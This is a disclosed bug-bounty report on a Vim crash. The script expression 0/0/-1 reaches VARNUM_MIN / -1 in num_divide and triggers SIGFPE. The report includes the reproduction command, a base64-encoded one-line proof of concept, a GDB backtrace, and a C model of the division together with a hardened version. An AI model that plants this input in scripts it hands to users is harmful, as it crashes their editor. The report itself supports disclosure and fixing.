Floating point exception in function num_divide at eval in vim/vim
Valid
Reported on Oct 18th 2022
Floating point exception in function num_divide at eval.c:70

Root cause: the PoC evaluates the legacy Vim script expression 0/0/-1. Division by zero is already special-cased in num_divide (the -VARNUM_MAX / VARNUM_MAX branches visible in the source listing below), and 0/0 yields the most negative value a varnumber_T can hold, -VARNUM_MAX - 1 (RAX = 0x8000000000000000 in the register dump). The second division then asks for that value / -1 (R11 = -1). The true quotient, 2^63, does not fit in a signed 64-bit integer, so the idiv instruction raises a divide-error trap on quotient overflow, which the kernel delivers as SIGFPE. VARNUM_MIN / -1 is the one signed division that overflows and the only case num_divide does not guard.
vim version
git log -1
commit db4c94788ad70118fa1ccc5fbc821757350ac771 (HEAD -> master, tag: v9.0.0769, origin/master, origin/HEAD)
Proof of Concept
# ./src/vim -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
Floating point exception
Content of poc_min (base64 encoded; it decodes to the single line cal s(0/0/-1, i.e. :call of a function s with the argument expression 0/0/-1; the argument is evaluated in get_func_arguments, see the backtrace, and crashes before the call is completed):
Y2FsIHMoMC8wLy0x
GDB output:
pwndbg> r -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
Starting program: /root/vim/src/vim -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGFPE, Arithmetic exception.
0x00005610b5f67cdb in num_divide (n2=-1, n1=<optimized out>, failed=<optimized out>) at eval.c:70
70 result = n1 / n2;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───[ REGISTERS / show-flags off / show-compact-regs off ]──
*RAX 0x8000000000000000
*RBX 0x7ffee0e09ca0 ◂— 0x0
*RCX 0x5610b748d820 (__afl_area_initial) ◂— 0x0
*RDX 0xffffffffffffffff
*RDI 0x5610b6a9f760 (__afl_area_ptr) —▸ 0x5610b748d820 (__afl_area_initial) ◂— 0x0
*RSI 0x2f
R8 0x0
*R9 0xfffdc1c136c ◂— 0x0
*R10 0x7ffee0e095a0 ◂— 0x0
*R11 0xffffffffffffffff
*R12 0x7ffee0e09c60 ◂— 0x5
*R13 0x7ffee0e0aa40 ◂— 0x5
*R14 0x7ffee0e0afd0 ◂— 0x1
*R15 0x8000000000000000
*RBP 0x7ffee0e09d90 —▸ 0x7ffee0e0a030 —▸ 0x7ffee0e0a170 —▸ 0x7ffee0e0a2f0 —▸ 0x7ffee0e0a550 ◂— ...
*RSP 0x7ffee0e09c20 ◂— 0x41b58ab3
*RIP 0x5610b5f67cdb (eval7+2587) ◂— idiv r11
────[ DISASM / x86-64 / set emulate on ]───
► 0x5610b5f67cdb <eval7+2587> idiv r11
↓
0x5610b5f67cdb <eval7+2587> idiv r11
──────[ SOURCE (CODE) ]───────
In file: /root/vim/src/eval.c
65 result = -VARNUM_MAX;
66 else
67 result = VARNUM_MAX;
68 }
69 else
► 70 result = n1 / n2;
71
72 return result;
73 }
74
75 /*
─────[ STACK ]──────
00:0000│ rsp 0x7ffee0e09c20 ◂— 0x41b58ab3
01:0008│ 0x7ffee0e09c28 —▸ 0x5610b6857698 ◂— '4 32 4 14 getnext.i:2442 48 4 12 getnext:3539 64 16 9 var2:3540 96 4 10 error:3545'
02:0010│ 0x7ffee0e09c30 —▸ 0x5610b5f672c0 (eval7) ◂— push rbp
03:0018│ 0x7ffee0e09c38 ◂— 0x0
... ↓ 4 skipped
───────[ BACKTRACE ]────
► f 0 0x5610b5f67cdb eval7+2587
f 1 0x5610b5f67cdb eval7+2587
f 2 0x5610b5f65b0b eval6+299
f 3 0x5610b5f650b1 eval5+209
f 4 0x5610b5f644a5 eval4+325
f 5 0x5610b5f63513 eval3+275
f 6 0x5610b5f3e02b eval1+395
f 7 0x5610b5f3e02b eval1+395
pwndbg> bt
#0 0x00005610b5f67cdb in num_divide (n2=-1, n1=<optimized out>, failed=<optimized out>) at eval.c:70
#1 eval7 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0, want_string=0) at eval.c:3666
#2 0x00005610b5f65b0b in eval6 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:3309
#3 0x00005610b5f650b1 in eval5 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0xffffffffffffffff) at eval.c:3198
#4 0x00005610b5f644a5 in eval4 (arg=<optimized out>, rettv=<optimized out>, evalarg=<optimized out>) at eval.c:3049
#5 0x00005610b5f63513 in eval3 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:2910
#6 0x00005610b5f3e02b in eval2 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:2784
#7 eval1 (arg=0x7ffee0e0a920, rettv=<optimized out>, evalarg=0x7ffee0e0afd0) at eval.c:2630
#8 0x00005610b6628019 in get_func_arguments (arg=0x7ffee0e0aa20, evalarg=<optimized out>, partial_argc=<optimized out>, argvars=<optimized out>, argcount=<optimized out>) at userfunc.c:1757
#9 0x00005610b66272cf in get_func_tv (name=<optimized out>, len=<optimized out>, rettv=<optimized out>, arg=<optimized out>, evalarg=<optimized out>, funcexe=<optimized out>) at userfunc.c:1820
#10 0x00005610b664b469 in ex_call_inner (eap=0x7ffee0e0b2e0, name=0x5610b6a9f760 <__afl_area_ptr> " \330H\267\020V", arg=0x5610b748d820 <__afl_area_initial>, startarg=0x7ffee0e095a0 "", evalarg=0x0, funcexe_init=<optimized out>) at userfunc.c:5647
#11 ex_call (eap=0x7ffee0e0b2e0) at userfunc.c:5971
#12 0x00005610b5ff046a in do_one_cmd (cmdlinep=0x7ffee0e0b510, flags=7, cstack=0x7ffee0e0b530, fgetline=0x5610b6445a50 <getsourceline>, cookie=0x7ffee0e0c120) at ex_docmd.c:2578
#13 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:990
#14 0x00005610b6443024 in do_source_ext (fname=<optimized out>, check_other=<optimized out>, is_vimrc=<optimized out>, ret_sid=<optimized out>, eap=<optimized out>, clearvars=<optimized out>) at scriptfile.c:1667
#15 0x00005610b6440c95 in do_source (check_other=0, is_vimrc=0, ret_sid=0x0, fname=<optimized out>) at scriptfile.c:1811
#16 cmd_source (fname=<optimized out>, eap=0x7ffee0e0c460) at scriptfile.c:1163
#17 0x00005610b5ff046a in do_one_cmd (cmdlinep=0x7ffee0e0c690, flags=11, cstack=0x7ffee0e0c6b0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2578
#18 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:990
#19 0x00005610b6809f1a in exe_commands (parmp=<optimized out>) at main.c:3135
#20 vim_main2 () at main.c:781
#21 0x00005610b680720c in main (argc=11, argv=0x7ffee0e0f9c8) at main.c:432
#22 0x00007f887ac9cd90 in __libc_start_call_main (main=main@entry=0x5610b6802900 <main>, argc=argc@entry=11, argv=argv@entry=0x7ffee0e0f9c8) at ../sysdeps/nptl/libc_start_call_main.h:58
#23 0x00007f887ac9ce40 in __libc_start_main_impl (main=0x5610b6802900 <main>, argc=11, argv=0x7ffee0e0f9c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffee0e0f9b8) at ../csu/libc-start.c:392
#24 0x00005610b5d2a265 in _start ()
Impact
This vulnerability is capable of crashing software. Any legacy Vim script expression that reaches num_divide with VARNUM_MIN as the dividend and -1 as the divisor terminates the process with SIGFPE, so sourcing an untrusted script, or evaluating an attacker-controlled expression, is a denial of service. The trap is raised by the CPU before any result is stored, so no memory corruption is involved; the impact is limited to the crash.
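The crash and its hardening, as an added example that is not vim's source code: a stand-alone C model of num_divide() on a signed 64-bit varnumber_T. It reproduces the divide-by-zero handling visible in the source listing, shows which input pair reaches the overflowing idiv, and evaluates the PoC's expression chain with a guarded divide. The function names num_divide_unchecked, num_divide_checked, quotient_overflows and eval_divide_chain, the minimal expression parser, and the choice to saturate VARNUM_MIN / -1 to VARNUM_MAX are this example's assumptions, not a statement of what vim's fix returns.

```c
/* Added example, not vim's code: a model of num_divide() on a 64-bit signed
 * varnumber_T that shows why the script expression 0/0/-1 traps and how the
 * division is hardened. The saturation value used for VARNUM_MIN / -1 is
 * this example's assumption, not a statement about what vim returns. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

typedef int64_t varnumber_T;
#define VARNUM_MAX INT64_MAX
#define VARNUM_MIN INT64_MIN

/* Divide-by-zero handling as in the GDB source listing above (legacy script:
 * 0/0 -> -VARNUM_MAX - 1, n/0 -> +/-VARNUM_MAX), then an unconditional
 * division. With n1 == VARNUM_MIN and n2 == -1 the quotient 2^63 does not
 * fit in 64 bits; x86-64 idiv raises #DE and the process dies with SIGFPE. */
static varnumber_T num_divide_unchecked(varnumber_T n1, varnumber_T n2)
{
    if (n2 == 0) {
        if (n1 == 0)
            return -VARNUM_MAX - 1;           /* "similar to NaN" */
        return n1 < 0 ? -VARNUM_MAX : VARNUM_MAX;
    }
    return n1 / n2;                           /* traps for VARNUM_MIN / -1 */
}

/* The only signed 64-bit quotient that overflows is VARNUM_MIN / -1. */
static int quotient_overflows(varnumber_T n1, varnumber_T n2)
{
    return n1 == VARNUM_MIN && n2 == -1;
}

/* Hardened version: handle the overflow pair before the CPU sees it.
 * Saturating to VARNUM_MAX (the nearest representable value to 2^63) is
 * the assumption made here. */
static varnumber_T num_divide_checked(varnumber_T n1, varnumber_T n2)
{
    if (n2 == 0) {
        if (n1 == 0)
            return -VARNUM_MAX - 1;
        return n1 < 0 ? -VARNUM_MAX : VARNUM_MAX;
    }
    if (quotient_overflows(n1, n2))
        return VARNUM_MAX;
    return n1 / n2;
}

struct chain_result {
    int ok;             /* 0 if the chain did not parse */
    int would_trap;     /* 1 if num_divide_unchecked() would have crashed */
    varnumber_T value;  /* result of the checked evaluation */
};

/* Left-to-right evaluation of "a/b/c/..." with the checked divide, the
 * order vim's expression parser applies a run of '/' operators. Minimal
 * parser (assumption): decimal integers with optional sign, separated by '/'. */
static struct chain_result eval_divide_chain(const char *expr)
{
    struct chain_result r = { 0, 0, 0 };
    char *end;
    varnumber_T acc = strtoll(expr, &end, 10);
    if (end == expr)
        return r;
    while (*end == '/') {
        const char *p = end + 1;
        varnumber_T rhs = strtoll(p, &end, 10);
        if (end == p)
            return r;
        if (quotient_overflows(acc, rhs))
            r.would_trap = 1;
        acc = num_divide_checked(acc, rhs);
    }
    if (*end != '\0')
        return r;
    r.ok = 1;
    r.value = acc;
    return r;
}

int main(void)
{
    /* Constructed inputs: the PoC's argument expression plus two benign ones. */
    const char *inputs[] = { "0/0/-1", "100/-7", "0/0" };
    for (size_t i = 0; i < sizeof inputs / sizeof *inputs; i++) {
        struct chain_result r = eval_divide_chain(inputs[i]);
        printf("%-8s ok=%d would_trap=%d value=%lld\n", inputs[i], r.ok,
               r.would_trap, (long long)r.value);
    }
    /* num_divide_unchecked(VARNUM_MIN, -1) is deliberately not called:
     * on x86-64 it terminates this program with SIGFPE exactly like vim. */
    printf("7 / -2 = %lld\n", (long long)num_divide_unchecked(7, -2));
    return 0;
}
```

For the PoC chain the checked evaluation reports would_trap=1 and returns VARNUM_MAX instead of dying; the guard costs one compare on an already-cold path and can be placed right after the n2 == 0 branch in the real function.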
Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale
Interesting corner case.
ex7l0it has been awarded the disclosure bounty.